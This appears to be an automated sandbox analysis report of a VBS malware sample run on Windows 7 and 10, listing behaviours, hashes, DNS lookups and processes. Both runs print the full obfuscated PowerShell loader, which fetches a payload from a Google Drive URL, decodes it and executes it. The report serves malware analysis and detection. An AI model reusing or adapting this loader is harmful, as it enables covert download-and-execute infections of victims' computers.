Analysis Overview
SHA256
688671fcf92adabafc63e4833b50f9730bab3a3295848589c2720f0e34462225
Threat Level: Shows suspicious behavior
The file 24dac6b183fc5cb29533742b3e54f209.bin was found to be: Shows suspicious behavior.
Malicious Activity Summary
Legitimate hosting services abused for malware hosting/C2
Command and Scripting Interpreter: PowerShell
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-13 01:20
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-13 01:20
Reported
2024-06-13 01:23
Platform
win7-20240508-en
Max time kernel
144s
Max time network
149s
Command Line
Signatures
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1744 wrote to memory of 1976 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1744 wrote to memory of 1976 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1744 wrote to memory of 1976 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1976 wrote to memory of 2160 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe |
| PID 1976 wrote to memory of 2160 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe |
| PID 1976 wrote to memory of 2160 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\259e6985a69d303cbd0945bb663c8ad54c28ef2cce53c2271b6e4912476d6f7b.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -windowstyle 1 "$Personliste = 1;$Binomialkoefficientens='';Function Superbusily($Livvidde){$Chrysothrix=$Livvidde.Length-$Personliste;$Servility=$Binomialkoefficientens+'Substring';For( $Ignoreringen=7;$Ignoreringen -lt $Chrysothrix;$Ignoreringen+=8){$bytrafik+=$Livvidde.$Servility.Invoke( $Ignoreringen, $Personliste);}$bytrafik;}function Outhue($Gaspedalens){ . ($Spasmolytically) ($Gaspedalens);}$Prvetekstens=Superbusily 'TinkturMphilosoo,nalterzS.ainleiSsp.jdelEneherslAstroloaEliks,r/Ru,idum5Undivid.Multinu0 ilians Cons.ab(PrveudsWtown,eaiRadbuganByggefod Mi,troo Fysik,w unnomas kek.te M,ulanaNOffent,TSpender Untramp1firedel0 dibenz.,igtana0 arrowi; Udbry. Und.rfoW Unb.waiGr,vsmenSeksual6 proede4 ,ynebe; Taktfa Registx For,rg6 adduce4Vekselr;st,dent Ruge.sprLocus.ivUn moke:Re,nves1 tautol2 Insinu1Eng evi.Kulmine0de.embr)Postpat Impo tuGCarcinoeorgi,stcComputekOphedenohovedsk/ Gaader2infleks0Renssan1Kvgsmis0Erhverv0Opslags1Jeremys0emballe1V.ginis Res.skFSvikml iGste.rer udbredeU combifGe.dannokitsdogx Efterh/Superco1 S oleb2Ynkelig1Volplan.Boldspi0 Deepin ';$Salgsvarerne=Superbusily ' F glefUf,ldauts Aboli.edesertarFreder.-RekursiAsalam.ng GordiaeRhombohnBa,ehtttO.nifor ';$nucleole=Superbusily 'AfstreghStorebrtNutc,ketVerdenspniddin.sQuac le:Mariali/Samarit/ Signa,dJasminerOpskresiA etyltvFolkedreNe gang.Le,ekasgStj,mpeoUnshunnoRentekogf,lserulIndh,ntePr mrpr.Defacinclevo,ucoudkradsm.taalig/S.rmoneu Unascec Uncomp?Tikmpere MotacixVenizelp HovedboRekomperklis.ertEuphono=HomophodSplenetoHelgenswbaadeh.nAbbrevilP.essero Be.utyaUroleucdDrmmesl&Quai eriTeknokrdHakkapi=Oxidise1 ,nciderSammenkrDagbrknbMor,enazTralledlbipinnaq SalthoYUnderbiRMo.ndinL NathasCKoeksissexten.alinaktivPSpha,roKA.lurenLGennems1rendejeyChrys.pp CouthsoUnderdr1bnskrafFFod,oldEmis urn1StraaliuHypnotiOSprachlkLoes,es3VoltospKPr.depeJKnhjdenaDalagamW LagdefKRu.dten ';$Beaandingens=Superbusily 'Lighter>gre.twh ';$Spasmolytically=Superbusily 'scorneri Ufo.tveBogtrykxBanesaa ';$Munkerup='Bankerotten';$Idrttens = Superbusily '.ihiliseGhu mulcNaadesthBadekaao muskie Par.elr%,ladtrya Refr.spSnortlepPenneprdgen.nskaJorganst SociolaPa,anuc%Ar.ogra\Te.charFCre enyi Temperd LindyseSluknt,is alinokFjerneno Ousterm F.rbrumDeceleri Overr.sLimstensBlgetopa WhilterDramatiiRoughfos Reoff k Palladehailstos Electr.MainfraSA judanlOrohydra,arobes Katikc &acrorha&Lipect, ImodstoeAmarantcLithotrhNonviraoRubb.ri StasiditMonokro ';Outhue (Superbusily 'Var etp$Staggerg Nasturl CarpinoParadokb Enst.vaClor,gelIn.esba:OdiscotsPa,tisorTrimorpgwant.nseutvetydf Kom.etlS praseoTaagetarFlyndereKursusmn avan.eeDemagogs bol,je= Adaman(Led,ggacFlamme m Shar idSvr,eds Skilten/B,nkbesc Highto nononer$ WondroI DusrjgdLandganrTantalitEksporttS.bningeInd lagnFaineansGilrava)Partner ');Outhue (Superbusily ' Coadju$GoaledogNnnen.elPanosteo.lejencbSumm tiaLig stilTrickli:sammentSKon raklApterinaSk,devapaf egnesBelomant Hektari ParthecUsigelikAnonolj=Plurip.$layloclnPachucouImplemecAstrobilOpslidse EjerlaoLrerf rlPrincewePapirp . Ubesvasauto trp NaboinlSuperheiKohrenttMejerie(Div,rce$InclipsBSynl gheChefkriahaevespaStopfodnInvaliddRabbitiiDe,entrnRewiresgUvealtoeU.recogntilplanslate,op)Tobacco ');$nucleole=$Slapstick[0];$Overgild= (Superbusily ' ymphom$GestaltgGenforelAkkumuloPrfer.nbUncorreaF,rhaanlAflyse :Vin ergSOutseekuGloppyhb PoliticSandhe,uCervinatSvedkiriJunkb,as ArmbeveHaspninsKnappyg=KopskatNbeskytteFjernstwFolkere-serg,lrO Hum.nmb hattiojdiskoteeRumnskecNonvolutaarsb.r KoreishS OlaviayHejsevrsMedusiftIltendeeSt.esermMapmaki.UnputriNHemmelieHistioltant.rea.ChauffeW TyranteSoc.alab re,derCoverderlRet.pleiAl,amiaeflippinnSkuflert');$Overgild+=$srgeflorenes[1];Outhue ($Overgild);Outhue (Superbusily 'Hrerrsf$PresynaSTerrazzuDok.tnibhagridicUforeneu.oncinntTeatersiNedsablsM asbygeTeltligsForespr.Decim lHBestormeFortrstaS,uirtidKasseapeKulturprG,ldfiss Antisp[Wo msee$ Medi,bSBredsdoaKvartsulHjemsengPreinjusPaxamprv Forv.la SissonrLyknskneArrearirHaeldten OutimaeBlurred]Forsvar=Or cula$EksisteP G benerToluid v NematoeVitrioltsvr.gteeNotoneck bab.lisCaricattOsogambedzoti.hn .ambods Horror ');$astringeringernes=Superbusily 'Idyllic$StatsfnSDemonteuCifbittb Overs,cBrasseyu FireletPyrr.lbiTerpolysEfteraaeModeordsH.vedba. VenkesDSeniorso Topob wrigor.snTjekkerl.eisminoTestkrsaBeothukd.oldjesF FyringiReflexelAmtsraae Gase.u( fldern$UricuronForegriuCapaletcSmdend.lBo,tedeeDolesfao Terapel Enh.nceNonrequ,Voldtgt$Pr.arbidS,egepaa Vagtstmlsk.dednNasalitaStradintPr genioGundesprDefrosty Tawesu)Kalk,la ';$damnatory=$srgeflorenes[0];Outhue (Superbusily 'marimba$W nterigTulisa lPlutonioSlavehabDelineaaNonargulLeptoce: araffiG LevedyyFilibuslMilieupdBre,vekiSkriblegAp.theohInquilieAsminesdopdukke2B.ossep3Galning3Slagt.s=Typwkul( Grupp,TstemplieArbejdesWirosc,tTreade.-applikaPMassersaSp.serntTeltdughMimeogr Udbrede$Transf,dSkrabnsaDemokramD.ovedhn UdvandaLayeragtAntisemoTowpathrisocyanyStruggl)Exsus i ');while (!$Gyldighed233) {Outhue (Superbusily 'Tvangsa$NewcolcgSkr.atolOpslidnoPhilolobFunnimeaEspaceml,altern:ClearinPKnastakeBrandforPatent,vFrikenda.oyarsslCotterhvInsula.aStrenger Manicu=cuppens$F,rurentUnemendrZurliteuJonos,re Freder ') ;Outhue $astringeringernes;Outhue (Superbusily 'AnfordrSparsleytReedieraSyvmiler nddatattimetal-.remsesS HypoamlPustersedroskebeAfmeldepKo,omip Bvelses4Solos.n ');Outhue (Superbusily ' ysiote$UdenriggBrnevenlBond.paoExtensubSevartwaPup idslOscillo:IntercoG De finyIridizalCoitaled Pr,ktiiMvhp,angUdsprinh MeseegeOk oberdVandlaa2Svanges3Reg.nte3Es roge=.anetti( forwarTvinc,nzeSu,chlosliersbatHar,eni-HovedpuP Ve,denaTotitivtHemiopihNetoper Madrepo$Koesem,d Ka.egoa Indsaam PituitnBrothiea DoomhotLo rdesoHulketmrTyssendyHortiku) Croose ') ;Outhue (Superbusily 'Singale$Cokyshig ormulal NaturmoambiencbVantguaaCalligrlF,annel:SpillepAJagtprouFaglitttErgometoGenansklSkade.ryUdfyldtcA,pehoru Venstrs dignit=Nylonsp$DecostagEliminelSti.lepo Tipoldbenle.fdaReallnslDecrimi:UntheisAVaccinenUd yndegCheeseme Reg.nelUdtydnifGangartiRejehopsTeatersh,irknineSkibs,asMaski,s+Ejefald+Spiseb.%Opposit$Feci.lbS aturallForew,eaKlbestrp Hoveris misfo.thawkmotiDybhavscUderumskFiskeku.Unlethac SeksteoRec,rbouBrunel nDesa,metPhotpho ') ;$nucleole=$Slapstick[$Autolycus];}$Rjsernes=333842;$Definitionernes=30113;Outhue (Superbusily 'Rutilan$SpecialgFrustrelU dvrlioPepitatbPigletcaFel.adhlMendels: C,ffinC S.lonkiParamutl ProduklA.leygaemul,angrChl.ropyKlippe. S rafpo=Iliocos IndtgtGClawsnoeForfaretHvn,err- UautorCUnd.rshoOpbevarn no,exptGlucon.eParlam,nindirectPetr li cryptoc$.pegepldDemagogaBlivesmmAntiantn flerspa EksametStrainao Udlig rdrspiony Succum ');Outhue (Superbusily 'Haavard$Spad efgTristezl aproctoDeco.orbMelonryaDelmomelAbl.cta:V,ndprvAkluk atn F,ttoge FlaffesMiracu tManubrihFederaleUrinaletUnphiloiKha,arfzNaivisme Oarf,s Martyn= udhol Th,irse[Dahlia SLength,y IsvintsVerden.t UnrumoeDinornimModef.l.VendetaCJoyprooo Honni.nB rgninvDisco.ye AfskrarDugpunktPhototr]Unmolde: rader,: SommerF Benz.nrS.dpudeoSlgtsfem AncienBEffulgea KedushsForbilleMetam.r6Epigene4BunchbaSAandendtcausewarVac.inaiEyeshadnSpl chngDefinie(Soigner$M gdepaCIno erci allotl Biklanl SyphoneOberstirSubstriySummon.) Tilbag ');Outhue (Superbusily ' Re,ros$Sw.thergOstracolFedes.ioB,slagsb AzandeaBelevnel Artles:Friskh TWash dlu ExtracmGuesserpSkytteklConstitiAmpelidndabblineHimen,f Trilleb=Sektion Hellang[ efloccSEudaimoyUn.andssPangaratTi,trnge HarengmSeismog.straf,eTPolydemeTristicx.efloattGennems.Fo teraEAdsprednObscurac FletteoTantal.dKreditgiChromatnEksterngKartere]Unaggra:Unsatir:MoseegmAP,rmafrSPokerisCArchimpIAbalienITvivlsw.PegepinGSnustobeMave,netBesotscSK,ressetPlat yfr SexoloiFormumnn F,libugFormaak(Angstfu$.oneybeAAgricsynGudet,mePljtelesBeflendt Disperh VandroeTransvetEfter,ri SmaglszMarisaseBr eraa)Kdetrkb ');Outhue (Superbusily 'Cotehel$ Vaun.hgArchie l Retsopo KontrobFreshenaSubs.anlWale ty:Re,ubliFDr coceoDv.geflrFoveolee OveropsDe.oaguk PropenrSyge.ikiHulrumbvEn cture MistralEnfiressOrdkriteEnma dsrGangbessafs.ori=Forsyth$rectifiTKrigsk,uOve.sttmDelingspLimberel Antirei Brach,nExecra eEngrosp.JordspesShrimpiuKodekseb MyrernsNon,portSpr tkrrPer,onaiPreco,snPlebeiag Monato(Liftgat$e oismsRTremblyjBefrielsToneflge PteridrForla snSvigerseMas incsArren t,Or,anis$Finhak DRundskaeSu arytfGob esoi DisdennFiktio,iUmennestP eceabiUdbandtoMi osfin EdeltreSvibl,nrKrselsfnDrt,inseContinusEpicond)Ind,cie ');Outhue $Foreskrivelsers;"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fideikommissariskes.Sla && echo t"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | drive.google.com | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
Files
C:\Users\Admin\AppData\Local\Temp\Ggehvidens.txt
| MD5 | 1bdacc28017d2adeab8c40b68e30acfd |
| SHA1 | 94ac78a16d912649ddb9421ddf3017aed9556660 |
| SHA256 | 5c0997916dcf6961681d53886efa088f514aa237301c311ab3cabaab526b2744 |
| SHA512 | 409d19810ea569da7fdbf73d916958e39ac2853124b289217e3c9d7ebac9ce225ff954663938a381244d4f82b890ac0094f060ba8ac2e2882856f45f13d864ef |
memory/1976-328-0x000007FEF585E000-0x000007FEF585F000-memory.dmp
memory/1976-329-0x000000001B530000-0x000000001B812000-memory.dmp
memory/1976-330-0x0000000002310000-0x0000000002318000-memory.dmp
memory/1976-331-0x000007FEF55A0000-0x000007FEF5F3D000-memory.dmp
memory/1976-332-0x000007FEF55A0000-0x000007FEF5F3D000-memory.dmp
memory/1976-333-0x000007FEF55A0000-0x000007FEF5F3D000-memory.dmp
memory/1976-334-0x000007FEF585E000-0x000007FEF585F000-memory.dmp
memory/1976-335-0x000007FEF55A0000-0x000007FEF5F3D000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-13 01:20
Reported
2024-06-13 01:23
Platform
win10v2004-20240508-en
Max time kernel
150s
Max time network
151s
Command Line
Signatures
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 5068 wrote to memory of 4296 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 5068 wrote to memory of 4296 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 4296 wrote to memory of 184 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe |
| PID 4296 wrote to memory of 184 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\259e6985a69d303cbd0945bb663c8ad54c28ef2cce53c2271b6e4912476d6f7b.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -windowstyle 1 "$Personliste = 1;$Binomialkoefficientens='';Function Superbusily($Livvidde){$Chrysothrix=$Livvidde.Length-$Personliste;$Servility=$Binomialkoefficientens+'Substring';For( $Ignoreringen=7;$Ignoreringen -lt $Chrysothrix;$Ignoreringen+=8){$bytrafik+=$Livvidde.$Servility.Invoke( $Ignoreringen, $Personliste);}$bytrafik;}function Outhue($Gaspedalens){ . ($Spasmolytically) ($Gaspedalens);}$Prvetekstens=Superbusily 'TinkturMphilosoo,nalterzS.ainleiSsp.jdelEneherslAstroloaEliks,r/Ru,idum5Undivid.Multinu0 ilians Cons.ab(PrveudsWtown,eaiRadbuganByggefod Mi,troo Fysik,w unnomas kek.te M,ulanaNOffent,TSpender Untramp1firedel0 dibenz.,igtana0 arrowi; Udbry. Und.rfoW Unb.waiGr,vsmenSeksual6 proede4 ,ynebe; Taktfa Registx For,rg6 adduce4Vekselr;st,dent Ruge.sprLocus.ivUn moke:Re,nves1 tautol2 Insinu1Eng evi.Kulmine0de.embr)Postpat Impo tuGCarcinoeorgi,stcComputekOphedenohovedsk/ Gaader2infleks0Renssan1Kvgsmis0Erhverv0Opslags1Jeremys0emballe1V.ginis Res.skFSvikml iGste.rer udbredeU combifGe.dannokitsdogx Efterh/Superco1 S oleb2Ynkelig1Volplan.Boldspi0 Deepin ';$Salgsvarerne=Superbusily ' F glefUf,ldauts Aboli.edesertarFreder.-RekursiAsalam.ng GordiaeRhombohnBa,ehtttO.nifor ';$nucleole=Superbusily 'AfstreghStorebrtNutc,ketVerdenspniddin.sQuac le:Mariali/Samarit/ Signa,dJasminerOpskresiA etyltvFolkedreNe gang.Le,ekasgStj,mpeoUnshunnoRentekogf,lserulIndh,ntePr mrpr.Defacinclevo,ucoudkradsm.taalig/S.rmoneu Unascec Uncomp?Tikmpere MotacixVenizelp HovedboRekomperklis.ertEuphono=HomophodSplenetoHelgenswbaadeh.nAbbrevilP.essero Be.utyaUroleucdDrmmesl&Quai eriTeknokrdHakkapi=Oxidise1 ,nciderSammenkrDagbrknbMor,enazTralledlbipinnaq SalthoYUnderbiRMo.ndinL NathasCKoeksissexten.alinaktivPSpha,roKA.lurenLGennems1rendejeyChrys.pp CouthsoUnderdr1bnskrafFFod,oldEmis urn1StraaliuHypnotiOSprachlkLoes,es3VoltospKPr.depeJKnhjdenaDalagamW LagdefKRu.dten ';$Beaandingens=Superbusily 'Lighter>gre.twh ';$Spasmolytically=Superbusily 'scorneri Ufo.tveBogtrykxBanesaa ';$Munkerup='Bankerotten';$Idrttens = Superbusily '.ihiliseGhu mulcNaadesthBadekaao muskie Par.elr%,ladtrya Refr.spSnortlepPenneprdgen.nskaJorganst SociolaPa,anuc%Ar.ogra\Te.charFCre enyi Temperd LindyseSluknt,is alinokFjerneno Ousterm F.rbrumDeceleri Overr.sLimstensBlgetopa WhilterDramatiiRoughfos Reoff k Palladehailstos Electr.MainfraSA judanlOrohydra,arobes Katikc &acrorha&Lipect, ImodstoeAmarantcLithotrhNonviraoRubb.ri StasiditMonokro ';Outhue (Superbusily 'Var etp$Staggerg Nasturl CarpinoParadokb Enst.vaClor,gelIn.esba:OdiscotsPa,tisorTrimorpgwant.nseutvetydf Kom.etlS praseoTaagetarFlyndereKursusmn avan.eeDemagogs bol,je= Adaman(Led,ggacFlamme m Shar idSvr,eds Skilten/B,nkbesc Highto nononer$ WondroI DusrjgdLandganrTantalitEksporttS.bningeInd lagnFaineansGilrava)Partner ');Outhue (Superbusily ' Coadju$GoaledogNnnen.elPanosteo.lejencbSumm tiaLig stilTrickli:sammentSKon raklApterinaSk,devapaf egnesBelomant Hektari ParthecUsigelikAnonolj=Plurip.$layloclnPachucouImplemecAstrobilOpslidse EjerlaoLrerf rlPrincewePapirp . Ubesvasauto trp NaboinlSuperheiKohrenttMejerie(Div,rce$InclipsBSynl gheChefkriahaevespaStopfodnInvaliddRabbitiiDe,entrnRewiresgUvealtoeU.recogntilplanslate,op)Tobacco ');$nucleole=$Slapstick[0];$Overgild= (Superbusily ' ymphom$GestaltgGenforelAkkumuloPrfer.nbUncorreaF,rhaanlAflyse :Vin ergSOutseekuGloppyhb PoliticSandhe,uCervinatSvedkiriJunkb,as ArmbeveHaspninsKnappyg=KopskatNbeskytteFjernstwFolkere-serg,lrO Hum.nmb hattiojdiskoteeRumnskecNonvolutaarsb.r KoreishS OlaviayHejsevrsMedusiftIltendeeSt.esermMapmaki.UnputriNHemmelieHistioltant.rea.ChauffeW TyranteSoc.alab re,derCoverderlRet.pleiAl,amiaeflippinnSkuflert');$Overgild+=$srgeflorenes[1];Outhue ($Overgild);Outhue (Superbusily 'Hrerrsf$PresynaSTerrazzuDok.tnibhagridicUforeneu.oncinntTeatersiNedsablsM asbygeTeltligsForespr.Decim lHBestormeFortrstaS,uirtidKasseapeKulturprG,ldfiss Antisp[Wo msee$ Medi,bSBredsdoaKvartsulHjemsengPreinjusPaxamprv Forv.la SissonrLyknskneArrearirHaeldten OutimaeBlurred]Forsvar=Or cula$EksisteP G benerToluid v NematoeVitrioltsvr.gteeNotoneck bab.lisCaricattOsogambedzoti.hn .ambods Horror ');$astringeringernes=Superbusily 'Idyllic$StatsfnSDemonteuCifbittb Overs,cBrasseyu FireletPyrr.lbiTerpolysEfteraaeModeordsH.vedba. VenkesDSeniorso Topob wrigor.snTjekkerl.eisminoTestkrsaBeothukd.oldjesF FyringiReflexelAmtsraae Gase.u( fldern$UricuronForegriuCapaletcSmdend.lBo,tedeeDolesfao Terapel Enh.nceNonrequ,Voldtgt$Pr.arbidS,egepaa Vagtstmlsk.dednNasalitaStradintPr genioGundesprDefrosty Tawesu)Kalk,la ';$damnatory=$srgeflorenes[0];Outhue (Superbusily 'marimba$W nterigTulisa lPlutonioSlavehabDelineaaNonargulLeptoce: araffiG LevedyyFilibuslMilieupdBre,vekiSkriblegAp.theohInquilieAsminesdopdukke2B.ossep3Galning3Slagt.s=Typwkul( Grupp,TstemplieArbejdesWirosc,tTreade.-applikaPMassersaSp.serntTeltdughMimeogr Udbrede$Transf,dSkrabnsaDemokramD.ovedhn UdvandaLayeragtAntisemoTowpathrisocyanyStruggl)Exsus i ');while (!$Gyldighed233) {Outhue (Superbusily 'Tvangsa$NewcolcgSkr.atolOpslidnoPhilolobFunnimeaEspaceml,altern:ClearinPKnastakeBrandforPatent,vFrikenda.oyarsslCotterhvInsula.aStrenger Manicu=cuppens$F,rurentUnemendrZurliteuJonos,re Freder ') ;Outhue $astringeringernes;Outhue (Superbusily 'AnfordrSparsleytReedieraSyvmiler nddatattimetal-.remsesS HypoamlPustersedroskebeAfmeldepKo,omip Bvelses4Solos.n ');Outhue (Superbusily ' ysiote$UdenriggBrnevenlBond.paoExtensubSevartwaPup idslOscillo:IntercoG De finyIridizalCoitaled Pr,ktiiMvhp,angUdsprinh MeseegeOk oberdVandlaa2Svanges3Reg.nte3Es roge=.anetti( forwarTvinc,nzeSu,chlosliersbatHar,eni-HovedpuP Ve,denaTotitivtHemiopihNetoper Madrepo$Koesem,d Ka.egoa Indsaam PituitnBrothiea DoomhotLo rdesoHulketmrTyssendyHortiku) Croose ') ;Outhue (Superbusily 'Singale$Cokyshig ormulal NaturmoambiencbVantguaaCalligrlF,annel:SpillepAJagtprouFaglitttErgometoGenansklSkade.ryUdfyldtcA,pehoru Venstrs dignit=Nylonsp$DecostagEliminelSti.lepo Tipoldbenle.fdaReallnslDecrimi:UntheisAVaccinenUd yndegCheeseme Reg.nelUdtydnifGangartiRejehopsTeatersh,irknineSkibs,asMaski,s+Ejefald+Spiseb.%Opposit$Feci.lbS aturallForew,eaKlbestrp Hoveris misfo.thawkmotiDybhavscUderumskFiskeku.Unlethac SeksteoRec,rbouBrunel nDesa,metPhotpho ') ;$nucleole=$Slapstick[$Autolycus];}$Rjsernes=333842;$Definitionernes=30113;Outhue (Superbusily 'Rutilan$SpecialgFrustrelU dvrlioPepitatbPigletcaFel.adhlMendels: C,ffinC S.lonkiParamutl ProduklA.leygaemul,angrChl.ropyKlippe. S rafpo=Iliocos IndtgtGClawsnoeForfaretHvn,err- UautorCUnd.rshoOpbevarn no,exptGlucon.eParlam,nindirectPetr li cryptoc$.pegepldDemagogaBlivesmmAntiantn flerspa EksametStrainao Udlig rdrspiony Succum ');Outhue (Superbusily 'Haavard$Spad efgTristezl aproctoDeco.orbMelonryaDelmomelAbl.cta:V,ndprvAkluk atn F,ttoge FlaffesMiracu tManubrihFederaleUrinaletUnphiloiKha,arfzNaivisme Oarf,s Martyn= udhol Th,irse[Dahlia SLength,y IsvintsVerden.t UnrumoeDinornimModef.l.VendetaCJoyprooo Honni.nB rgninvDisco.ye AfskrarDugpunktPhototr]Unmolde: rader,: SommerF Benz.nrS.dpudeoSlgtsfem AncienBEffulgea KedushsForbilleMetam.r6Epigene4BunchbaSAandendtcausewarVac.inaiEyeshadnSpl chngDefinie(Soigner$M gdepaCIno erci allotl Biklanl SyphoneOberstirSubstriySummon.) Tilbag ');Outhue (Superbusily ' Re,ros$Sw.thergOstracolFedes.ioB,slagsb AzandeaBelevnel Artles:Friskh TWash dlu ExtracmGuesserpSkytteklConstitiAmpelidndabblineHimen,f Trilleb=Sektion Hellang[ efloccSEudaimoyUn.andssPangaratTi,trnge HarengmSeismog.straf,eTPolydemeTristicx.efloattGennems.Fo teraEAdsprednObscurac FletteoTantal.dKreditgiChromatnEksterngKartere]Unaggra:Unsatir:MoseegmAP,rmafrSPokerisCArchimpIAbalienITvivlsw.PegepinGSnustobeMave,netBesotscSK,ressetPlat yfr SexoloiFormumnn F,libugFormaak(Angstfu$.oneybeAAgricsynGudet,mePljtelesBeflendt Disperh VandroeTransvetEfter,ri SmaglszMarisaseBr eraa)Kdetrkb ');Outhue (Superbusily 'Cotehel$ Vaun.hgArchie l Retsopo KontrobFreshenaSubs.anlWale ty:Re,ubliFDr coceoDv.geflrFoveolee OveropsDe.oaguk PropenrSyge.ikiHulrumbvEn cture MistralEnfiressOrdkriteEnma dsrGangbessafs.ori=Forsyth$rectifiTKrigsk,uOve.sttmDelingspLimberel Antirei Brach,nExecra eEngrosp.JordspesShrimpiuKodekseb MyrernsNon,portSpr tkrrPer,onaiPreco,snPlebeiag Monato(Liftgat$e oismsRTremblyjBefrielsToneflge PteridrForla snSvigerseMas incsArren t,Or,anis$Finhak DRundskaeSu arytfGob esoi DisdennFiktio,iUmennestP eceabiUdbandtoMi osfin EdeltreSvibl,nrKrselsfnDrt,inseContinusEpicond)Ind,cie ');Outhue $Foreskrivelsers;"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fideikommissariskes.Sla && echo t"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
Files
C:\Users\Admin\AppData\Local\Temp\Ggehvidens.txt
| MD5 | 714cb325c3d69ffdf652293ead3d50b1 |
| SHA1 | f79daa74b0ff2c765007c8b0e22a3bedb05ba5a6 |
| SHA256 | 641832d41890d7f88f0ebbbd45d1168bfdb199408820ee139e1f2c8d0b62587d |
| SHA512 | 816a67a4407ec8850ed9fa0dde87f5c5dd6959e68b378865a338f6253d1e0a9ff51dc63c85497491dafd29b53b96702e08c937017eb2ba6d3ea7bfffbe6da07a |
C:\Users\Admin\AppData\Local\Temp\Ggehvidens.txt
| MD5 | 5791b2b2b17aa013def1da16dcbc8ab3 |
| SHA1 | 841fcae50ddd7f66b105744deae2d3424762ba1b |
| SHA256 | 3f153f741aa814f65701c4f2ad0d97a53049e30148a9a48437434fb6a971b38b |
| SHA512 | 82391bb1c6ea2b006982bce3da12e564afa965cc603e1ecac5b42ca02b44f768ded0f12979c4a6b5b926e333e53402b20cf7040f3042ead16e84d25714aca1fa |
C:\Users\Admin\AppData\Local\Temp\Ggehvidens.txt
| MD5 | 1bdacc28017d2adeab8c40b68e30acfd |
| SHA1 | 94ac78a16d912649ddb9421ddf3017aed9556660 |
| SHA256 | 5c0997916dcf6961681d53886efa088f514aa237301c311ab3cabaab526b2744 |
